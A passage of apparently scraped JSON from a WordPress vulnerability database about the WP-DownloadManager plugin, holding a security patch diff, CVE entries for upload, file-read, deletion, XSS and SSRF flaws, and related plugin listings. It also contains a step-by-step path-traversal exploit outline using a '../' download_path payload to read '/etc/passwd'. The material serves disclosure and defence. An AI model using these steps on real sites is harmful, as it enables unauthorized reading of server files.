traversal sequences like '..\u002F' following the prefix\nif ( substr( $download_path, 0, strlen( WP_CONTENT_DIR ) ) !== WP_CONTENT_DIR ) {\n $download_path = WP_CONTENT_DIR;\n}\n\n\u002F\u002F ... \n\nupdate_option('download_path', $download_path);","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php\t2024-08-19 13:32:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\t2026-02-13 01:54:04.000000000 +0000\n@@ -139,16 +139,21 @@\n \t\t\t\t\t\t\tif( $file_upload_to !== '\u002F' ) {\n \t\t\t\t\t\t\t\t$file_upload_to = $file_upload_to . '\u002F';\n \t\t\t\t\t\t\t}\n-\t\t\t\t\t\t\tif(move_uploaded_file($_FILES['file_upload']['tmp_name'], $file_path.$file_upload_to.basename($_FILES['file_upload']['name']))) {\n-\t\t\t\t\t\t\t\t$file = $file_upload_to.basename($_FILES['file_upload']['name']);\n-\t\t\t\t\t\t\t\t$file = download_rename_file($file_path, $file);\n-\t\t\t\t\t\t\t\t$file_size = filesize($file_path.$file);\n+\t\t\t\t\t\t\t$validate = wp_check_filetype_and_ext( $_FILES['file_upload']['tmp_name'], basename( $_FILES['file_upload']['name'] ) );\n+\t\t\t\t\t\t\tif ( $validate['type'] === false ) {\n+\t\t\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . __('File type is invalid', 'wp-downloadmanager') . '\u003C\u002Fp>';\n+\t\t\t\t\t\t\t\t\tbreak;\n+\t\t\t\t\t\t\t}\n+\t\t\t\t\t\t\tif( move_uploaded_file( $_FILES['file_upload']['tmp_name'], $file_path.$file_upload_to . basename( $_FILES['file_upload']['name'] ) ) ) {\n+\t\t\t\t\t\t\t\t$file = $file_upload_to . basename( $_FILES['file_upload']['name'] );\n+\t\t\t\t\t\t\t\t$file = download_rename_file( $file_path, $file );\n+\t\t\t\t\t\t\t\t$file_size = filesize( $file_path . $file );\n \t\t\t\t\t\t\t} else {\n-\t\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.__('Error In Uploading File', 'wp-downloadmanager').'\u003C\u002Fp>';\n+\t\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . __('Error In Uploading File', 'wp-downloadmanager') . '\u003C\u002Fp>';\n \t\t\t\t\t\t\t\tbreak;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t} else {\n-\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.__('Error In Uploading File', 'wp-downloadmanager').'\u003C\u002Fp>';\n+\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . __('Error In Uploading File', 'wp-downloadmanager') . '\u003C\u002Fp>';\n \t\t\t\t\t\t\tbreak;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n@@ -208,21 +213,20 @@\n \t\tcase __('Delete File', 'wp-downloadmanager');\n \t\t\tcheck_admin_referer('wp-downloadmanager_delete-file');\n \t\t\t$file_id = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n-\t\t\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n-\t\t\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n+\t\t\t$file = $wpdb->get_row( $wpdb->prepare( \"SELECT * FROM $wpdb->downloads WHERE file_id = %d\", $file_id ) );\n \t\t\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? intval( $_POST['unlinkfile'] ) : 0;\n-\t\t\tif($unlinkfile == 1) {\n-\t\t\t\tif(!unlink($file_path.$file)) {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\tif ( $unlinkfile === 1 ) {\n+\t\t\t\tif ( ! unlink( $file_path . $file->file ) ) {\n+\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . sprintf( __( 'Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t} else {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">' . sprintf( __( 'File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t}\n \t\t\t}\n-\t\t\t$deletefile = $wpdb->query(\"DELETE FROM $wpdb->downloads WHERE file_id = $file_id\");\n-\t\t\tif(!$deletefile) {\n-\t\t\t\t$text .= '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t$deletefile = $wpdb->query( $wpdb->prepare( \"DELETE FROM $wpdb->downloads WHERE file_id = %d\", $file->file_id ) );\n+\t\t\tif ( ! $deletefile ) {\n+\t\t\t\t$text .= '\u003Cp style=\"color: red;\">' . sprintf( __('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file->file_name, $file->file) . '\u003C\u002Fp>';\n \t\t\t} else {\n-\t\t\t\t$text .= '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t$text .= '\u003Cp style=\"color: green;\">' . sprintf( __('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file->file_name, $file->file) . '\u003C\u002Fp>';\n \t\t\t}\n \t\t\tbreak;\n \t}\n@@ -376,9 +380,7 @@\n \t\t\u003C?php if(!empty($text)) { echo '\u003C!-- Last Action -->\u003Cdiv id=\"message\" class=\"updated fade\">\u003Cp>'.stripslashes($text).'\u003C\u002Fp>\u003C\u002Fdiv>'; } ?>\n \t\t\u003C!-- Delete A File -->\n \t\t\u003Cform method=\"post\" action=\"\u003C?php echo admin_url('admin.php?page='.plugin_basename(__FILE__)); ?>\">\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo intval($file->file_id); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file ) ); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_name\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file_name ) ); ?>\" \u002F>\n+\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo esc_attr( intval( $file->file_id ) ); ?>\" \u002F>\n \t\t\t\u003C?php wp_nonce_field('wp-downloadmanager_delete-file'); ?>\n \t\t\t\u003Cdiv class=\"wrap\">\n \t\t\t\t\u003Ch2>\u003C?php _e('Delete A File', 'wp-downloadmanager'); ?>\u003C\u002Fh2>\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-options.php\t2025-05-16 01:50:28.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-options.php\t2026-02-13 01:54:04.000000000 +0000\n@@ -39,7 +39,10 @@\n $download_options = array('use_filename' => $download_options_use_filename, 'rss_sortby' => $download_options_rss_sortby, 'rss_limit' => $download_options_rss_limit);\n \n \u002F\u002F Validate\n- if ( substr( $download_path, 0, strlen( WP_CONTENT_DIR ) ) !== WP_CONTENT_DIR ) {\n+ $real_download_path = realpath( $download_path );\n+ $real_wp_content_dir = realpath( WP_CONTENT_DIR );\n+\n+ if ( false === $real_download_path || false === $real_wp_content_dir || strpos( $real_download_path . DIRECTORY_SEPARATOR, $real_wp_content_dir ) !== 0 || strpos( $download_path, '..\u002F' ) !== false ) {\n $download_path = WP_CONTENT_DIR;\n }","1. Authenticate to the WordPress admin dashboard as an Administrator (or a user with the 'manage_downloads' capability).\n2. Navigate to the plugin's 'Download Options' page to obtain a valid nonce for the 'wp-downloadmanager_options' action.\n3. Send a POST request to 'wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-options.php' to update the 'download_path' setting. The payload should include the required WP_CONTENT_DIR prefix followed by enough '..\u002F' sequences to reach the server's root directory (e.g., '\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002F..\u002F..\u002F..\u002F..\u002F').\n4. Navigate to the 'Add File' page and register a new download. Set the 'File Type' to 'Local File' and provide the relative path to a sensitive file (e.g., 'etc\u002Fpasswd' if the download path was set to '\u002F').\n5. Identify the newly created file's ID (dl_id) and access the frontend download endpoint (e.g., '\u002F?dl_id=[ID]') to receive the content of the traversed file.","2026-04-19 06:00:54","2026-04-19 06:01:20",{"id":86,"url_slug":87,"title":88,"description":89,"plugin_slug":4,"theme_slug":39,"affected_versions":90,"patched_in_version":91,"severity":92,"cvss_score":93,"cvss_vector":94,"vuln_type":95,"published_date":96,"updated_date":97,"references":98,"days_to_patch":48,"patch_diff_files":100,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-10747","wp-downloadmanager-authenticated-admin-arbitrary-file-upload","WP-DownloadManager \u003C= 1.68.11 - Authenticated (Admin+) Arbitrary File Upload","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the download-add.php file in all versions up to, and including, 1.68.11. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","\u003C=1.68.11","1.69","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2025-09-25 00:00:00","2025-09-26 05:27:21",[99],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2c535cea-dad6-440f-b37f-6d196b469214?source=api-prod",[],{"id":102,"url_slug":103,"title":104,"description":105,"plugin_slug":4,"theme_slug":39,"affected_versions":106,"patched_in_version":107,"severity":41,"cvss_score":108,"cvss_vector":109,"vuln_type":110,"published_date":111,"updated_date":112,"references":113,"days_to_patch":48,"patch_diff_files":115,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-4798","wp-downloadmanager-authenticated-administrator-arbitrary-file-read","WP-DownloadManager \u003C= 1.68.10 - Authenticated (Administrator+) Arbitrary File Read","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.68.10. This is due to a lack of restriction on the directory an administrator can select for storing downloads. This makes it possible for authenticated attackers, with Administrator-level access and above, to download and read any file on the server, including system and configuration files.","\u003C=1.68.10","1.68.11",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2025-06-10 15:30:37","2025-06-11 03:41:52",[114],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6cd166bc-774e-4083-b5f7-bffba1f7c293?source=api-prod",[],{"id":117,"url_slug":118,"title":119,"description":120,"plugin_slug":4,"theme_slug":39,"affected_versions":106,"patched_in_version":107,"severity":92,"cvss_score":93,"cvss_vector":94,"vuln_type":121,"published_date":122,"updated_date":123,"references":124,"days_to_patch":48,"patch_diff_files":126,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-4799","wp-downloadmanager-authenticated-administrator-arbitrary-file-deletion","WP-DownloadManager \u003C= 1.68.10 - Authenticated (Administrator+) Arbitrary File Deletion","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file deletion due to lack of restriction on the directory a file can be deleted from in all versions up to, and including, 1.68.10. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This vulnerability can be paired with CVE-2025-4798 to delete any file within the WordPress root directory.","Absolute Path Traversal","2025-06-10 00:00:00","2025-06-11 03:41:53",[125],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff9d9e485-171f-4e36-943d-397d540e31f4?source=api-prod",[],{"id":128,"url_slug":129,"title":130,"description":131,"plugin_slug":4,"theme_slug":39,"affected_versions":132,"patched_in_version":133,"severity":41,"cvss_score":134,"cvss_vector":135,"vuln_type":136,"published_date":137,"updated_date":138,"references":139,"days_to_patch":141,"patch_diff_files":142,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2024-47341","wp-downloadmanager-reflected-cross-site-scripting","WP-DownloadManager \u003C= 1.68.8 - Reflected Cross-Site Scripting","The WP-DownloadManager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.68.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","\u003C=1.68.8","1.68.9",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2024-09-27 00:00:00","2024-10-03 13:22:33",[140],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1ef82f14-f6e3-4e9a-9656-d2d15fbfefb8?source=api-prod",7,[],{"id":144,"url_slug":145,"title":146,"description":147,"plugin_slug":4,"theme_slug":39,"affected_versions":148,"patched_in_version":149,"severity":41,"cvss_score":150,"cvss_vector":151,"vuln_type":136,"published_date":152,"updated_date":153,"references":154,"days_to_patch":156,"patch_diff_files":157,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2022-25605","wp-downloadmanager-plugin-stored-cross-site-scripting","WP-DownloadManager plugin \u003C= 1.68.6 - Stored Cross-Site Scripting","Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions \u003C= 1.68.6). Vvulnerable parameters &download_path, &download_path_url, &download_page_url.","\u003C1.68.7","1.68.7",4.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","2022-01-12 13:42:00","2024-01-22 19:56:02",[155],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbede3241-6383-4bdb-ac28-cd9781b608d1?source=api-prod",740,[],{"id":159,"url_slug":160,"title":161,"description":162,"plugin_slug":4,"theme_slug":39,"affected_versions":148,"patched_in_version":149,"severity":41,"cvss_score":150,"cvss_vector":151,"vuln_type":136,"published_date":163,"updated_date":153,"references":164,"days_to_patch":166,"patch_diff_files":167,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2022-25606","wp-downloadmanager-stored-cross-site-scripting","WP-DownloadManager \u003C= 1.68.6 - Stored Cross-Site Scripting","Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions \u003C= 1.68.6). Vulnerable parameters &download_path, &download_path_url, &download_page_url, &download_categories.","2022-01-10 13:42:00",[165],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff15d39ba-9211-4d35-8252-20d53c6bc249?source=api-prod",742,[],{"id":169,"url_slug":170,"title":171,"description":172,"plugin_slug":4,"theme_slug":39,"affected_versions":173,"patched_in_version":149,"severity":41,"cvss_score":150,"cvss_vector":151,"vuln_type":136,"published_date":174,"updated_date":153,"references":175,"days_to_patch":177,"patch_diff_files":178,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2021-44760","wp-downloadmanager-plugin-reflected-cross-site-scripting","WP-DownloadManager plugin \u003C= 1.68.6 - Reflected Cross-Site Scripting","Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered in WP-DownloadManager WordPress plugin (versions \u003C= 1.68.6).","\u003C=1.68.6","2021-12-28 08:23:00",[176],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa27da737-d925-471f-b0e0-25bc27a95714?source=api-prod",755,[],{"id":180,"url_slug":181,"title":182,"description":183,"plugin_slug":4,"theme_slug":39,"affected_versions":184,"patched_in_version":185,"severity":41,"cvss_score":186,"cvss_vector":187,"vuln_type":188,"published_date":189,"updated_date":153,"references":190,"days_to_patch":192,"patch_diff_files":193,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2020-24141","wp-downloadmanager-server-side-request-forgery","WP-DownloadManager \u003C= 1.68.4 - Server-Side Request Forgery","Server-side request forgery in the WP-DownloadManager plugin 1.68.4 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the file_remote parameter to download-add.php. It can help identify open ports, local network hosts and execute command on services","\u003C1.68.5","1.68.5",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Server-Side Request Forgery (SSRF)","2021-04-13 00:00:00",[191],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbfe48948-7fc9-4806-b1b5-9fac5a6c7d96?source=api-prod",1015,[],{"slug":195,"display_name":7,"profile_url":8,"plugin_count":196,"total_installs":197,"avg_security_score":198,"avg_patch_time_days":199,"trust_score":200,"computed_at":201},"gamerz",20,888090,88,1377,71,"2026-05-20T06:56:43.884Z",[203,225,243,261,279],{"slug":204,"name":205,"version":206,"author":207,"author_profile":208,"description":209,"short_description":210,"active_installs":211,"downloaded":212,"rating":213,"num_ratings":214,"last_updated":215,"tested_up_to":216,"requires_at_least":17,"requires_php":18,"tags":217,"homepage":220,"download_link":221,"security_score":222,"vuln_count":223,"unpatched_count":48,"last_vuln_date":224,"fetched_at":31},"m1downloadlist","m1.DownloadList","0.24","maennchen1.de","https:\u002F\u002Fprofiles.wordpress.org\u002Fmaennchen1de\u002F","\u003Cp>This plugin easily displays the folders and files from a selected directory. It can be placed by shortcode with the parameters path and target in any post. Uploads must be done by a separate ftp program. No managing options.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>compatible up to PHP 8.3.20\u003C\u002Fli>\n\u003Cli>need PHP extension \u003Ca href=\"http:\u002F\u002Fphp.net\u002Fmb_string\" rel=\"nofollow ugc\">mb_string\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>available optional shortcode parameters\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>path = directory path, starting by web root (default: wp-content\u002Fuploads\u002F)\u003C\u002Fli>\n\u003Cli>target = browser window name\u003C\u002Fli>\n\u003Cli>sort = by name ASC\u002FDESC (default: ASC)\u003C\u002Fli>\n\u003Cli>sort-order = filename\u002Ffiletype\u002Fftime\u002Ffiletime\u002Ffoldertime (default: filename)\u003C\u002Fli>\n\u003Cli>label = custom top level label\u003C\u002Fli>\n\u003Cli>nosize = displays no file size\u003C\u002Fli>\n\u003Cli>hidedirs = displays no folders, only files\u003C\u002Fli>\n\u003Cli>filetype = (comma separated list) filter files by their extension\u003C\u002Fli>\n\u003Cli>hidefiletype = (comma separated list) hide files with filetype\u003C\u002Fli>\n\u003Cli>hidefilename = (comma separated list) hide named files and folders\u003C\u002Fli>\n\u003Cli>noext = hide the file extensions\u003C\u002Fli>\n\u003Cli>nobreadcrumb = hide breadcrumb \u002F title\u003C\u002Fli>\n\u003Cli>ftime = display file and folder modification date and time (standard = “1” or use date formatting like “Y-m-d H:i”), see \u003Ca href=\"http:\u002F\u002Fphp.net\u002Fdate\" rel=\"nofollow ugc\">PHP date formatting\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>filetime = same as ftime, just for files\u003C\u002Fli>\n\u003Cli>foldertime = same as ftime, just for folders\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>(most of it can be combined together)\u003C\u002Fp>\n\u003Ch4>shortcode examples\u003C\u002Fh4>\n\u003Col>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>: \u003Ccode>[m1dll]\u003C\u002Fcode> \u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>your\u002Ffoldername\u002Fhere\u002F\u003C\u002Fcode>: \u003Ccode>[m1dll path=\"your\u002Ffoldername\u002Fhere\u002F\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>your\u002Ffoldername\u002Fhere\u002F\u003C\u002Fcode> and sort descending: \u003Ccode>[m1dll path=\"your\u002Ffoldername\u002Fhere\u002F\" sort=\"DESC\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>your\u002Ffoldername\u002Fhere\u002F\u003C\u002Fcode>, open files in a new window: \u003Ccode>[m1dll path=\"your\u002Ffoldername\u002Fhere\u002F\" target=\"_blank\"]\u003C\u002Fcode> \u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>your\u002Ffoldername\u002Fhere\u002F\u003C\u002Fcode>, change label ‘downloads’ to ‘our downloads’: \u003Ccode>[m1dll path=\"your\u002Ffoldername\u002Fhere\u002F\" label=\"our downloads\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays no file size: \u003Ccode>[m1dll nosize=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays no folders: \u003Ccode>[m1dll hidedirs=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays only pdf- and docx-documents: \u003Ccode>[m1dll filetype=\"pdf,docx\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, do not display pdf- and docx-documents: \u003Ccode>[m1dll hidefiletype=\"pdf,docx\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, do not display file secret.txt and secret.docx: \u003Ccode>[m1dll hidefilename=\"secret.txt,secret.docx\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays no file extensions: \u003Ccode>[m1dll noext=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays no breadcrumb: \u003Ccode>[m1dll nobreadcrumb=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with file and folder time with own format \u003Ccode>[m1dll ftime=\"Y-m-d, H:i\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with file and folder date and time (standard from WordPress) \u003Ccode>[m1dll ftime=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with file and folder self formated date \u003Ccode>[m1dll ftime=\"Y-m-d\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with file date and time (standard from WordPress) \u003Ccode>[m1dll filetime=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, with folder date and time (standard from WordPress) \u003Ccode>[m1dll foldertime=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003C\u002Fol>\n","This plugin easily displays the folders and files from a selected directory. It can be placed by shortcode in any post.",400,18057,94,21,"2025-11-25T14:32:00.000Z","6.8.5",[218,21,22,219,23],"attachment","filemanager","http:\u002F\u002Fmaennchen1.de","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fm1downloadlist.0.24.zip",78,2,"2025-04-04 00:00:00",{"slug":226,"name":227,"version":228,"author":229,"author_profile":230,"description":231,"short_description":232,"active_installs":28,"downloaded":233,"rating":196,"num_ratings":56,"last_updated":234,"tested_up_to":235,"requires_at_least":236,"requires_php":18,"tags":237,"homepage":240,"download_link":241,"security_score":242,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"download-manager-ms","Download Manager MS","1.1.0","bquade","https:\u002F\u002Fprofiles.wordpress.org\u002Fbquade\u002F","\u003Cp>Download manager with:\u003Cbr \u002F>\n* multisite support\u003Cbr \u002F>\n* download buttons and forms\u003Cbr \u002F>\n* easy file uploads\u003Cbr \u002F>\n* stats charts\u003Cbr \u002F>\n* much 